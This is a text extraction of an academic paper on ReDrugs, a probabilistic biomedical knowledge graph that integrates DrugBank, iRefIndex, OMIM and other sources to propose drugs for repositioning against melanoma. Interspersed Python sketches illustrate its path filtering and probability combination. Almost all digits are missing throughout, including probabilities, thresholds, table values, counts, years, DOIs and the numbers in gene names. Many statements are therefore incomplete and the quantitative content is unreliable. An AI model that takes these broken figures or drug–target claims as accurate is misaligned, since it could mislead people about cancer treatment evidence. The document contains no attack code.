mcguinness, dlm@cs.rpi.edu academic editor yonghong peng additional information and declarations can be found on page doi . /peerj-cs. copyright mccusker et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:mccusj@�cs.�rpi.�edu mailto:dlm@�cs.�rpi.�edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ similarity (yang & agarwal, ; ye, liu & wei, ), drug and/or disease similarity (chiang & butte, ; gottlieb et al., ), genome-wide association studies (kingsmore et al., ; grover et al., ), and gene expression (lamb et al., ; sirota et al., ). systems biology has also provided a number of network analysis approaches (yang & agarwal, ; wu, wang & chen, ; cheng et al., ; emig et al., ; harrold, ramanathan & mager, ; wu et al., ; vogt, prinz & campillos, ) but the field has been limited by a fragmentation of databases. most systems biology databases are not aligned with each other, and typically leave out crucial information about how other biological entities, like drugs and diseases, interact with the systems biology graph. further, while some interaction databases provide human curation and validation of pathway interactions, and others provide experimental evidence for the recorded interactions, there has not yet been, to our knowledge, a resource that combines the two approaches and quantifies the reliability of the evidence used to assert the interactions. a knowledge graph is a compilation of facts and figures that can be used to provide contextual meaning to searches. google is using knowledge graphs to improve its search and to analyze the information graph of the web; facebook is using them to analyze the social graph. we built our knowledge graph with the goal of unifying large parts of biomedical domain knowledge for both mining and interactive exploration related to drugs, diseases, and proteins. our knowledge graph is enhanced by the provenance of each fragment of knowledge captured, which is used to compute the confidence probabilities for each of those fragments. further, we use open standards from the world wide web consortium (w c), including the resource description framework (rdf) (richard, david & markus, ), web ontology language (owl) (motik, patel-schneider & cuenca grau, ), and sparql (harris, seaborne & prud’hommeaux, ). the representation of the knowledge in our knowledge graph is aligned with best practice vocabularies and ontologies from the w c and the biomedical community, including the provenance ontology (prov-o) (lebo, sahoo & mcguinness, ), the hupo proteomics standards initiative molecular interactions (psi-mi) ontology (hermjakob et al., ), and the semanticscience integrated ontology (sio) (dumontier et al., ). use of these standards, vocabularies, and ontologies make it simple for redrugs to integrate with other similar efforts in the future with minimal effort. we proposed and built a novel computational drug repositioning platform, that we refer to as redrugs, that applies probabilistic filtering over individually-supported assertions drawn from multiple databases pertaining to systems biology, pharmacology, disease association, and gene expression data. we use our platform to identify novel and known drugs for melanoma. 
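the probabilistic filtering that redrugs applies over the knowledge graph can be pictured with a small sketch. the code below is illustrative only (the graph structure, probabilities, and function names are invented, and the actual system stores the graph in rdf and queries it rather than walking a python dictionary): it expands outward from a disease node, multiplies edge confidence probabilities along each path under an independence assumption, and keeps drugs reached within a bounded number of interaction steps whose joint probability clears a threshold.

```python
# illustrative sketch (not the redrugs implementation): enumerate paths from a disease
# node to drug nodes in an interaction graph whose edges carry confidence probabilities,
# keeping drugs reachable within `max_steps` interactions whose joint probability
# (product of edge probabilities, assuming independence) meets a threshold.

def candidate_drugs(graph, disease, max_steps=3, min_joint_p=0.9):
    """graph: dict mapping node -> list of (neighbor, probability, node_type)."""
    hits = {}
    stack = [(disease, 1.0, 0, {disease})]
    while stack:
        node, joint_p, steps, visited = stack.pop()
        if steps == max_steps:
            continue
        for neighbor, p, node_type in graph.get(node, []):
            if neighbor in visited:
                continue
            new_p = joint_p * p
            if new_p < min_joint_p:
                continue                      # prune low-confidence paths early
            if node_type == "drug":
                hits[neighbor] = max(hits.get(neighbor, 0.0), new_p)
            stack.append((neighbor, new_p, steps + 1, visited | {neighbor}))
    return sorted(hits.items(), key=lambda kv: -kv[1])

# toy example with made-up probabilities: melanoma -- BRAF -- vemurafenib
toy = {
    "melanoma": [("BRAF", 0.98, "protein")],
    "BRAF": [("vemurafenib", 0.97, "drug"), ("MAP2K1", 0.95, "protein")],
    "MAP2K1": [("trametinib", 0.96, "drug")],
}
print(candidate_drugs(toy, "melanoma", max_steps=3, min_joint_p=0.9))
```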
results we used redrugs to examine the drug–target–disease network and identify known, novel, and well supported melanoma drugs. the redrugs knowledge base contained , drugs, , diseases, , proteins, and , interactions. the drugs included in redrugs follow the distribution by the anatomic therapeutic classification (atc) categories shown in fig. . mccusker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we examined drug and gene connections that were three or less interaction steps from melanoma, and additionally filtered interactions with a joint probability greater or equal to . . we identified drugs in the resulting drug–gene–disease network surrounding melanoma as illustrated in fig. . we then validated the set of drugs by determining their position in the drug discovery pipeline for melanoma. table shows that nearly all drugs uncovered by redrugs were previously been identified as potential melanoma therapies either in clinical trials or in vivo or in vitro. of the drugs, have been in phase i, ii, or iii clinical trials, five have been studied in vitro, four in vivo, one was investigated as a case study, and three are novel. to further evaluate our system, we examined the impact of decreasing the joint probability or increasing the number of interaction steps. figures a and b show precision, recall, and f-measure curves while varying each parameter. using these information retrieval performance curves, we found that using a joint probability of . or greater with three or less interaction steps maximizes the precision and recall as shown in fig. . by performing a sampled literature search on hypothesis candidates with a joint probability of . or higher and six or fewer interaction steps, we were able to generate precision, recall, and f-measure curves for both cutoffs to find our cutoff of . with three or fewer interaction steps. the precision, recall, and f-measure curves are shown for varying joint probability thresholds in fig. a and for varying interaction step counts in fig. b. figure percentage approved drugs in each of the categories of the anatomic therapeutic classification (atc) system. mccusker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ discussion we designed redrugs to quickly and automatically integrate and filter a heterogeneous biomedical knowledge graph to generate high-confidence drug repositioning candidates. our results indicate that redrugs generates clinically plausible drug candidates, in which half are in various stages of clinical trials, while others are novel or are being investigated in pre-clinical studies. by helping to consolidate the three main datatypes—drug targets, protein interactions, and disease genes—redrugs can amplify the ability of researchers to filter the vast amount of information into those that are relevant for drug discovery. candidate significance three drugs were identified that have not previously been studied for melanoma treatment. framycetin, a cxcr inhibitor, has not previously been considered for melanoma treatment. while it is nephrotoxic when administered orally (greenberg, ), it is used topically as an antibacterial treatment. while it may not be of use for metastasis, it might serve as a simple, inexpensive prophylactic treatment after excision of primary tumors. 
additionally, lucanthone and podofilox were identified as having potential effects on melanoma through cdkn a and map kinase, respectively. figure the interaction graph of predicted melanoma drugs with a probability of . or higher and have three or fewer intervening interactions between drug and disease. the “explore” tab contains the controls to expand the network in various ways, including the filtering parameters. node and edge detail tabs provide additional information about the selected node or edge, including the probabilities of the edges selected. users can control the layout algorithm and related options using the “options” tab. mccusker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ one drug we identified, vemurafenib, is approved for treatment of late stage melanoma has been shown to inhibit the braf protein in braf-v mutant melanomas (chapman et al., ). however, cells can become resistant to vemurafenib, thereby leading to metastasis (le et al., ). a number of the drugs we identified are in clinical trials for treatment of melanoma. we identified braf-oriented drugs, dabrafenib (hauschild et al., ), sorafenib (national cancer institute, ), and regorafenib (istituto clinico humanitas, ), that have been evaluated in clinical trials, but have not yet been approved. zidovudine or azidothymidine is a tert inhibitor that has shown significant melanoma tumor reductions in mouse models (humer et al., ). three map kinase-related compounds, vinblastine (luikart, kennealey & kirkwood, ), trametinib (kim et al., ), and vinorelbine (whitehead et al., ) were identified that are in clinical trials for melanoma treatment. cdkn a was another popular target, as irinotecan (fiorentini et al., ), table drug discovery status for drug candidates identified using redrugs. status drug pathway steps joint p approved vemurafenib (chapman et al., ) braf . phase iii dabrafenib (hauschild et al., ) braf . sorafenib (national cancer institute, ) braf . vinblastine (luikart, kennealey & kirkwood, ) map kinase . phase ii zidovudine (humer et al., ) tert . trametinib (kim et al., ) map kinase . regorafenib (istituto clinico humanitas, ) braf . nadroparin (nagy, turcsik & blaskó, ) myc . vinorelbine (whitehead et al., ) map kinase . irinotecan (fiorentini et al., ) cdkn a . topotecan (kraut et al., ) cdkn a . phase i sodium stibogluconate (naing, ) cdkn a . case study ingenol mebutate (mansuy et al., ) prkca/braf . in vitro bosutinib (homsi et al., ) map kinase . purvalanol (smalley et al., ) map kinase/tp . ellagic acid (kim et al., ) prkca/braf . albendazole (patel et al., ) cdkn a . colchicine (lemontt, azzaria & gros, ) map kinase . in vivo plerixafor (d’alterio et al., ) cxcr . vincristine (sawada et al., ) map kinase . l-methionine (clavo & wahl, ) cdkn a . mebendazole (doudican et al., ) cdkn a . novel framycetin cxcr . lucanthone cdkn a . podofilox map kinase . note: “pathway” refers to the target or pathway that the drug acts on. “steps” is distance in number of interactions between the drug and the disease, and “joint p” is the joint probability that all of those interactions occur. mccusker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ topotecan (kraut et al., ), and sodium stibogluconate (naing, ) are all drugs in clinical trial that we identified as potential therapies. many other drugs were identified that are being studied in the lab. 
additional drugs were identified that target the map kinase pathway, including bosutinib (homsi et al., ), purvalanol (smalley et al., ), colchicine (lemontt, azzaria & gros, ), and vincristine (sawada et al., ). podofilox has not yet been investigated in melanoma treatments, but preliminary investigations have focused on treating chronic lymphocytic leukemia (shen et al., ) and non-small cell lung cancer (peng et al., ). since these drugs attack mapk and related proteins rather than braf or nras, they can potentially synergize with other treatments (homsi et al., ). bosutinib in particular has been investigated as a synergistic treatment for melanoma (held et al., ). another possible treatment pathway is cxcr inhibition. mouse models suggest that cxcr inhibitors like plerixafor can reduce tumor metastasis and primary tumor growth (d'alterio et al., ). we identify both plerixafor and framycetin (neomycin b) as useful cxcr inhibitors. two prkca activators, ingenol mebutate and ellagic acid, were also identified. prkca binds with braf (pardo et al., ), but it is mechanistically unclear how prkca activation would result in treatment of melanoma. a number of other therapies are also notable. purvalanol can inhibit gsk b, which in turn activates tp . some, but not all, melanomas have tp deactivation (smalley et al., ). nadroparin, a myc inhibitor, may inhibit tumor progression (nagy, turcsik & blaskó, ). more broadly, heparins can potentially inhibit the metastatic process in melanoma and other cancers (maraveyas et al., ).

figure precision, recall, and f-measure by (a) varying thresholds for joint probability and (b) varying the number of interaction steps. precision is the percentage of returned candidates that have been validated experimentally or have been in a clinical trial (a "hit") versus all candidates returned. recall is the percentage of all known validated "hits." f-measure is the harmonic mean of precision and recall, and provides a balanced evaluation of the quality and completeness of the results.

the approach that we present here offers a novel, mechanism-focused exploration to identify and examine drugs and targets related to cancer. this approach filters out noisy or poorly supported parts of the knowledge graph to identify more confident mechanisms between drugs, targets, and diseases. thus, our approach can be used to explore high-confidence associations that are produced as a result of large-scale computational screens that use network connectivity (yang & agarwal, ; wu, wang & chen, ; cheng et al., ; emig et al., ; harrold, ramanathan & mager, ; wu et al., ; vogt, prinz & campillos, ), the complementarity in drug-disease gene expression, and the similarity of chemical fingerprints, side-effects, targets, or indications (yang & agarwal, ; ye, liu & wei, ; chiang & butte, ; gottlieb et al., ; lamb et al., ; sirota et al., ).
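As a rough sketch of the precision/recall/f-measure evaluation summarized in the figure caption above (not the authors' evaluation code), the snippet below sweeps a joint-probability cutoff over a candidate set and scores it against a set of validated "hits"; the candidate pairs and probabilities are made-up placeholders.

```python
# Hypothetical sketch of the precision/recall/f-measure threshold sweep.
# `scored_candidates` maps (drug, disease) pairs to a joint probability;
# `validated_hits` are pairs with published in vivo/in vitro support or a
# clinical trial. Both are illustrative placeholders, not the study's data.
def prf(retrieved, relevant):
    tp = len(retrieved & relevant)
    precision = tp / len(retrieved) if retrieved else 0.0
    recall = tp / len(relevant) if relevant else 0.0
    denom = precision + recall
    f_measure = (2 * precision * recall / denom) if denom else 0.0  # harmonic mean
    return precision, recall, f_measure

def sweep_thresholds(scored_candidates, validated_hits, thresholds):
    for t in thresholds:
        retrieved = {pair for pair, p in scored_candidates.items() if p >= t}
        p, r, f = prf(retrieved, validated_hits)
        print(f"threshold={t:.2f}  precision={p:.2f}  recall={r:.2f}  f={f:.2f}")

scored_candidates = {("vemurafenib", "melanoma"): 0.94,
                     ("framycetin", "melanoma"): 0.72,
                     ("aspirin", "melanoma"): 0.40}
validated_hits = {("vemurafenib", "melanoma")}
sweep_thresholds(scored_candidates, validated_hits, [0.3, 0.6, 0.9])
```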
importantly, since we focus on protein networks that are strongly linked with diseases, we believe that our mechanism focused approach will also aid in the identification of disease-modifying drug candidates, rather than solely those that would be useful for the treatment of symptomatic phenotypes or related co-morbid conditions. architecture redrugs uses a fairly straightforward web architecture, as shown in fig. . it uses the blazegraph rdf database backend. the database layer is interchangeable except that the full text search service needs to use blazegraph-only properties to perform text searches as text indexing is not yet standardized in the sparql query language. all other aspects are standardized and should work with other rdf databases without modification. redrugs currently uses the python-based turbogears web application framework hosted using the web services gateway interface standard via an apache http server. turbogears in turn hosts the semantic automated discovery and integration (sadi) web services that drive the application and access the database. it also serves up the static html and supporting files. rdf store python + apache web server /api/search /api/upstream /api/downstream javascript web client cytoscape.js javascript web client sparql json-ld figure the redrugs software architecture. using web standards and a three-layer architecture (rdf store, web server, and rich web client), we were able to build a complete knowledge graph analysis platform. mccusker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the user interface is implemented with angularjs and cytoscape.js, which submits queries to the sadi web services using json-ld and aggregates results into the networked view. the software relies exclusively on standardized protocols (http, sadi, sparql, rdf, and others) to make it simple to replace technologies as needed. the data itself is processed using conversion scripts as shown in fig. . we have also adapted and featured redrugs in an immersive visualization laboratory called the collaborative-research augmented immersive virtual environment (craive) lab at rpi, as shown in fig. . the goal of the demonstration was to explore new ways to visualize, sonify, and interact with big data in large-scale virtual reality systems. we also leveraged a gesture controller (microsoft kinect) to interact with the visualization. with the � projection, multiple people can explore the visualization concurrently, which accelerates the exploration and discovery speed. limitations and future work our study has a some limitations. first, our study is limited by the sources of data used. we used three databases (drugbank, irefindex, and online mendelian inheritance in man (omim)) to construct the initial knowledge graph. these databases are continuously changing and necessarily incomplete with respect to the total number of drugs, targets, protein interactions, diseases, and disease genes. for instance, as of / / there are over , additional fda approved drugs in drugbank than in the version that was initially used. 
second, the focus of our work is on the potential repositioning of fda redrugs api interaction network search and expansion irefindex redrugs rdf store analytical tools redrugs cytoscape.js app ontological resources protein/protein interaction ontology, semanticscience integrated ontology, gene ontology vocabularies, relationships queries queries graphqueries graph ii experimental method assessment experimental methods. evidence to probabilityconverted to nanopubs cytoscape, r, python, etc. figure the redrugs data flow. data is selected from external databases and converted using scripts into nanopublication graphs, which are loaded into the redrugs data store. this is combined with experimental method assessments, expressed in owl, and public ontologies into the rdf store. the web service layer queries the store and produces aggregate analyses of those nanopublications, which is con- sumed and displayed by the rich web client. the same apis can be used by other tools for further analysis. mccusker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ approved drugs, which means that tens of thousands of chemical compounds with protein binding activity cannot be considered as candidates in the current study. third, our path expansion is currently limited to pairwise protein–protein interactions, which excludes interactions as a result of protein complexes or regulatory pathways. having a more sophisticated understanding of non-direct interactions will help identify candidate drugs that can regulate entire pathways in a more rational manner. additionally, we aim to incorporate knowledge of the complementarity of drug and disease gene expression patterns as evidenced by the connectivity map (lamb et al., ), which could suggest therapeutic and adverse interactions. finally, as we develop new hypotheses about potential new drug effects, we plan to test them using a new three-dimensional cellular microarray to perform high-throughput drug screening (lee et al., ) with reference samples. the integration of computational predictions and high-throughput screening platform will enable the systematic evaluation of any drug or mechanism of action against any disease or adverse event. materials and methods this research project did not involve human subjects. the redrugs platform consists of a graphical web application, an application programming interface (api), and a knowledge base. the graphical web application enables users to initiate a search using drug, gene, and disease names and synonyms. users can then interact with the application to expand the network at an arbitrary number of interactions away from the entity of interest, and to filter the network based on a joint probability between the source and target entities. drug–protein, protein–protein, and gene–disease interactions were obtained from several datasets and integrated into ontology-annotated and provenance and evidence bearing representations called nanopublications. the web application obtains information from the knowledge base using semantic web services. finally, we evaluated our approach by figure the authors demonstrate the redrugs user interface in the collaborative-research augmented immersive virtual environment (craive) lab at rpi. mccusker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ examining the mechanistic plausibility of the drug in having melanoma-specific disease modifying ability. we evaluated a large number of possible drug/disease associations with varying joint probabilities and interaction steps to determine the thresholds with the highest f-measure, resulting in our thresholds of three or less interactions and a joint probability of . or higher. using the redrugs application page (http://redrugs.tw.rpi.edu) we initiate our search for “melanoma,” and select the first suggestion obtained from the experimental factor ontology (efo) (http://www.ebi.ac.uk/efo/efo_ ). the application then provides immediate neighborhood of drugs and genes that are associated with melanoma. we expanded the network by first selecting the melanoma node and expanding the link distance to |i| � and changing the minimum joint probability to p � . in the search options. importantly, we also limit the node type to “drug.” finally, we click on the “find incoming links” button (two left-facing arrows). when finished the network will show all drugs interacting with melanoma that meet the above criteria, as well as any intervening entities and their interactions. the resulting network can be downloaded as an image, or a summary csv file. we used the csv file to validate the links by searching google scholar and clinicaltrials.gov for each proposed drug/disease combination. we consider a “hit” to be a pairing with a published positive experiment in vivo or in vitro or any pairing that has been tested in a clinical trial. while this level of validation does not guarantee efficacy, it does determine if the resulting connection is a plausible hypothesis that might be tested. data fusion we developed a structured knowledge base containing data pertaining to drugs, targets, interactions, and diseases. we used five data sources: irefindex (razick, magklaras & donaldson, ), drugbank (wishart et al., ), uniprot gene ontology annotations (goa) (camon et al., ), the online mendelian inheritance in man (omim) (hamosh et al., ), and the catalogue of somatic mutations in cancer (cosmic) gene census (futreal et al., ). irefindex contains protein–protein interactions and protein complexes and is an amalgam of the biomolecular interaction network database (bader, betel & hogue, ), biogrid (stark et al., ), the comprehensive resource of mammalian protein complexes (ruepp et al., ), database of interacting proteins (xenarios et al., ), human protein reference database (keshava prasad et al., ), innatedb (lynn et al., ), intact (kerrien et al., ), matrixdb (chautard et al., ), molecular interaction database (chatr-aryamontri et al., ), mpact (güldener et al., ), microbial protein interaction database (goll et al., ), mips mammalian protein–protein interaction database (pagel et al., ), and online predicted human interaction database (brown & jurisica, ). drugbank provides information about experimental/approved drugs and their targets, and uniprot goa describes proteins in terms of their biological processes, cellular locations, and molecular functions. omim provides associations between genes and inherited or genetically-driven diseases. the cosmic gene census is a curated list of genes that have causal associations with one or more cancer types. mccusker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://redrugs.tw.rpi.edu http://www.ebi.ac.uk/efo/efo_ http://dx.doi.org/ . /peerj-cs. 
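Before associations drawn from these sources are wrapped into nanopublications (described next), each source record has to be reduced to a common assertion shape. The sketch below is an invented illustration of that normalization step, assuming simplified record layouts; it is not the project's actual conversion scripts.

```python
# Hypothetical sketch of data fusion: normalize heterogeneous source records
# into a common assertion tuple (subject, relation, object, source, evidence)
# before conversion to nanopublications. Field names and records are invented.
from dataclasses import dataclass

@dataclass(frozen=True)
class Assertion:
    subject: str
    relation: str
    obj: str
    source: str
    evidence: str  # e.g., "manual curation" or an experimental method name

def from_drugbank(record):
    # assumed record layout: {"drug": ..., "target": ...}
    return Assertion(record["drug"], "targets", record["target"],
                     source="drugbank", evidence="manual curation")

def from_omim(record):
    # assumed record layout: {"gene": ..., "disease": ...}
    return Assertion(record["gene"], "associated_with", record["disease"],
                     source="omim", evidence="manual curation")

assertions = [
    from_drugbank({"drug": "vemurafenib", "target": "BRAF"}),
    from_omim({"gene": "BRAF", "disease": "melanoma"}),
]
for a in assertions:
    print(a)
```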
https://peerj.com/computer-science/ each association (e.g., drug–target, protein–protein, disease–gene) was captured using the nanopublication (groth, gibson & velterop, ) scheme. a nanopublication is a digital artifact that consists of an assertion, its provenance, and information about the digital publication. our nanopublications are represented as linked data: each data item is identified using an dereferenceable http uniform resource identifier (uri) and statements are represented using the rdf. each nanopublication corresponds to a single interaction assertion from one of the databases. we used a number of automated scripts to produce the nanopublications and load them into the sparql endpoint. an example nanopublication is shown in fig. . we used the sio (dumontier et al., ) as a global schema to describe the nature and components of the associations, and coupled this with the psi-mi ontology (hermjakob et al., ) to denote the types of interactions. we used the w c’s prov-o (lebo, sahoo & mcguinness, ) to capture provenance of the assertion (which data source it originated from). we loaded our nanopublications into blazegraph, an rdf nanopublication compatible database. the data is accessed using its native sparql endpoint by the web application. assertion probability each knowledge graph fragment, enclosed in a nanopublication, is assigned a probability based on the quality of the methods used to create the assertions in the fragment. we compute probabilities based on two different methods. manually curated assertions, from drugbank, omim, and cosmic gene census, are directly given a probability p = . . assertions that have been derived from a specific experimental method are given probabilities appropriate for that method. these probabilities are derived from a expert-driven measure of the reliability of the experimental method used to derive the association. factors involved in the assessment of confidence include the degree of indirection in the assay, the sensitivity and specificity of the approach, and reproducibility of results under different conditions based on the comparative analyses of techniques (skrabanek et al. ; sprinzak, sattath & margalit, ). two expert bioinformaticians rated the reliability of each method and assigned a score of – , where corresponds to low confidence and to high confidence. after their initial assessment, they conferred on their reasoning for each score to resolve differences where possible. the experts considered level to correspond to weak evidence that needs independent verification. level methods are generally reliable, but should have additional biological evidence. level methods are high-quality method that produces few false positives. we calculated inter-annotator agreement between the two annotators over the three categories using scott’s pi. scott’s pi is similar to cohen’s kappa in that it improves on simple observed agreement by factoring in the extent of agreement that might be expected by chance. we determined the agreement to be . (scott’s pi value of . ) across experimental methods comprising of . % of interaction annotations (scott, ). the scores of , , and were then assigned provisional probabilities of p = . , p = . , and p = . respectively. we chose these probabilities as approximations of the conceptual levels of probability for each rating by the experts, and feel that those probabilities correspond to how often an experiment at that confidence level can be expected to be mccusker et al. ( ), peerj comput. sci., doi . 
/peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ accurate. we plan to provide a more rigorous assessment of the accuracy of each method against gold standards in future work. these confidence values were encoded into an owl ontology along with the evidence codes. the full inferences were extracted using pellet (https://github.com/complexible/pellet) and loaded into the sparql endpoint, where they were used to apply the probabilities to each assertion in the knowledge graph that had experimental evidence. semantic web services we developed four sadi web services (wilkinson, vandervalk & mccarthy, ) in python to support easy access to the nanopubications (see table ) in redrugs. the four services are enumerated in table . the first service is a simple free text lookup, that takes an pml:query (mcguinness et al., ) with a prov:value as a query and produces a set of entities whose labels contain the substring. this is used for interactive typeahead completion of search terms so users can look up uris and entities without needing to know the details. the other three sadi services look up interactions that contain a named entity. two of them look at the entity to find upstream and downstream connections, and the third service assumes that the entity is a biological process and finds all interactions that related to that process. the services return only one interaction for each triple (source, interaction type, target). there are often multiple probabilities per interaction, and more than one interaction per interaction type. this is because the interaction may have been recorded in multiple databases, based on different experimental methods. figure representation of a protein/protein interaction within a nanopublication. three graphs are represented. the assertion graph (nanopub_ _assertion), states that an interaction (x) is of type sio:directinteraction, and has the target of slc a , and a participant of ca . the supporting graph (nanopub_ _supporting), states that the assertion graph was generated by a pull down experi- ment (one of many encoded experiment types used in, a subclass of prov:activity. the attribution graph (nanopub_ _attribution), in turn, states that the assertion had a primary source of (loiselle et al., ) and that the interaction was quoted from biogrid. for further information on developing web services in python using sadi, see this tutorial: https://github.com/ markwilkinson/sadi-semantic-web- services-core/wiki/building-services- in-python pml , in development: https://github. com/timrdf/pml. this includes pml constructs that are not covered in prov-o. mccusker et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/complexible/pellet https://github.com/markwilkinson/sadi-semantic-web-services-core/wiki/building-services-in-python https://github.com/markwilkinson/sadi-semantic-web-services-core/wiki/building-services-in-python https://github.com/markwilkinson/sadi-semantic-web-services-core/wiki/building-services-in-python https://github.com/markwilkinson/sadi-semantic-web-services-core/wiki/building-services-in-python https://github.com/timrdf/pml https://github.com/timrdf/pml http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ to provide a single probability score for each interaction of a source and target, the interactions are combined. a single probability is generated per identified interaction by taking the geometric mean of the probabilities for that interaction. 
however, this method is undesirable when combining multiple interaction records of the same type. we instead combine the interaction records using a form of probabilistic voting based on composite z-scores. this is done to model the idea that multiple experiments that produce the same result reinforce each other, and should therefore give a higher overall probability than would be indicated by taking their mean or even by bayes' theorem. we do this by converting each probability into a z-score (aka standard score) using the quantile function q(), summing the values, and applying the cumulative distribution function cdf() to compute the corresponding probability:

$P(x_{1 \ldots n}) = \mathrm{CDF}\left(\sum_{i=1}^{n} Q(P(x_i))\right)$

these composite z-scores, which we transform back into probabilities, are frequently used to combine multiple indicators of the same underlying phenomenon, as in (moller et al., ). however, this strategy has a drawback: it does not account for multiple databases recording the same, non-independent experiment, which can inflate the probabilities of interactions described by experiments that are published in more than one database.

graph expansion using joint probability
in order to compute the probability that a given entity affects another, we compute the joint probability that each of the intervening interactions is true. the joint probability is the probability that every assertion in the set is true, and is computed by taking the product of the probabilities of each interaction:

$P(x_1 \wedge \ldots \wedge x_n) = \prod_{i=1}^{n} P(x_i)$

this joint probability is used as a threshold that users can set to stop graph expansion. we also provide expansion limits using the number of interaction steps that are needed to connect the two entities.

table redrugs api sadi web services. the api endpoint prefix is http://redrugs.tw.rpi.edu/api/.
- resource text search (url: search; input: pml:query; output: pml:answeredquery): look up resources using free text search against their rdfs labels. this service is optimized for typeahead user interfaces.
- find interactions in a biological process (url: process; input: sio:process; output: sio:process): find interactions whose participants or targets also participate in the input process.
- find upstream participants (url: upstream; input: sio:materialentity; output: sio:target): find interactions that the input entity is a target of and that have explicit participants.
- find downstream targets (url: downstream; input: sio:materialentity; output: sio:agent): find interactions that the input entity participates in and that have explicit targets.

user interface
the user interface was developed using the above sadi web services and uses cytoscape.js (http://cytoscape.github.io/cytoscape.js), angular.js (https://angularjs.org), and bootstrap (http://getbootstrap.com). an example network is shown in fig. . users can search for biological entities and processes, which can then be autocompleted to specific entities that are in the redrugs graph. users can then add those entities and processes to the displayed graph, retrieve upstream and downstream connections, and link out to more details for every entity. cytoscape.js is used as the main rendering and network visualization tool, and provides node and edge rendering, layout, and network analysis capabilities; it has been integrated into a customized rich web client.
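Returning to the probability calculations above, the two formulas can be written down directly. The sketch below is an illustration of the stated arithmetic, not the authors' implementation: it combines several probabilities reported for the same interaction by summing their standard-normal z-scores, and multiplies per-interaction probabilities along a path to obtain the joint probability used to limit graph expansion.

```python
# Hypothetical sketch of the probability arithmetic described above.
# combine_same_interaction: probabilistic "voting" via composite z-scores,
#   P = CDF( sum_i Q(p_i) ), where Q is the standard-normal quantile function.
# joint_probability: product of the probabilities along a path of interactions.
from scipy.stats import norm

def combine_same_interaction(probabilities):
    """Combine multiple probabilities asserted for the same interaction."""
    z_sum = sum(norm.ppf(p) for p in probabilities)  # quantile (inverse CDF)
    return norm.cdf(z_sum)

def joint_probability(path_probabilities):
    """Joint probability that every interaction on the path is true."""
    joint = 1.0
    for p in path_probabilities:
        joint *= p
    return joint

# Two independent experiments supporting the same interaction reinforce each other:
print(combine_same_interaction([0.75, 0.75]))   # ~0.91, higher than either alone
# A two-step path from drug to disease:
print(joint_probability([0.99, 0.95]))          # 0.9405
```

Note that, as the text above points out, this voting scheme treats every record as an independent experiment, so the same experiment mirrored in several databases would be double-counted.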
in order to evaluate this knowledge graph, we developed a demonstration web interface (http://redrugs.tw.rpi.edu) based on the cytoscape.js (http://cytoscape.github.io/ cytoscape.js) javascript library. the interface lets users enter biological entity names. as the user types, the text is resolved to a list of entities. the user finishes by selecting from the list, and submitting the search. the search returns interactions and nodes associated with the entity selected, which are added to the cytoscape.js graph. users are also able to select nodes and populate upstream or downstream connections. figure is an example output of this process. acknowledgements a special thanks to pascale gaudet who, with michel dumontier, evaluated the experimental methods and evidence codes listed in the protein/protein interaction ontology and gene ontology. thank you also to kusum solanki and john erickson for evaluation, feedback, and planning in the initial stages of this project. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � james p. mccusker conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. � michel dumontier conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, performed the computation work, reviewed drafts of the paper. � rui yan performed the experiments, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. mccusker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://cytoscape.github.io/cytoscape.js https://angularjs.org http://getbootstrap.com http://redrugs.tw.rpi.edu http://cytoscape.github.io/cytoscape.js http://cytoscape.github.io/cytoscape.js http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � sylvia he contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. � jonathan s. dordick conceived and designed the experiments, reviewed drafts of the paper. � deborah l. mcguinness conceived and designed the experiments, wrote the paper, reviewed drafts of the paper. data deposition the following information was supplied regarding data availability: data can be found at https://data.rpi.edu/xmlui/handle/ / . references bader gd, betel d, hogue cw. . bind: the biomolecular interaction network database. nucleic acids research ( ): – doi . /nar/gkg . barth a, wanek l, morton d. . prognostic factors in , melanoma patients with distant metastases. journal of the american college of surgeons ( ): – . bisgin h, liu z, fang h, kelly r, xu x, tong w. . a phenome-guided drug repositioning through a latent variable model. bmc bioinformatics ( ): doi . / - - - . bisgin h, liu z, kelly r, fang h, xu x, tong w. . investigating drug repositioning opportunities in fda drug labels through topic modeling. bmc bioinformatics (suppl ):s doi . / - - -s -s . brown kr, jurisica i. . online predicted human interaction database. bioinformatics ( ): – doi . /bioinformatics/bti . camon e, magrane m, barrell d, lee v, dimmer e, maslen j, binns d, harte n, lopez r, apweiler r. . 
